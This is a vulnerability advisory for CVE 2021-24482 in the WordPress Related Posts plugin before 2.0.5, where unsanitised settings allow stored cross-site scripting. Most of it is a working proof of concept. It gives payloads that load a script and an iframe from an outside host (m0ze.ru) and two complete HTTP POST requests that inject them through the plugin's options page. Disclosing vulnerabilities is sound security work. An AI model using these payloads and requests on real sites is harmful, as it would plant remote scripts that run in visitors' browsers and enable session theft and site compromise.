Related Posts for WordPress < 2.0.5 – Authenticated Stored XSS & XFS | CVE 2021-24482

Description

The plugin does not sanitise its heading_text and css settings, allowing high privilege users (admin) to set XSS payloads in them, leading to Stored Cross-Site Scripting issues.

Proof of Concept

Payloads:

[$] m0ze"><script src=//m0ze.ru/payload/a.js></script><div x

[$] m0ze</textarea><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x

PoC #1 | Authenticated Persistent XSS & XFS | Heading text:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x


PoC #2 | Authenticated Persistent XSS & XFS | CSS:

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

option_page=rp4wp&action=update&_wpnonce=101246c8a1&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=13&rp4wp%5Bheading_text%5D=m0ze%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&rp4wp%5Bexcerpt_length%5D=1337&rp4wp%5Bdisplay_image%5D=1&rp4wp%5Bcss%5D=m0ze%3C%2Ftextarea%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E%3Cdiv+x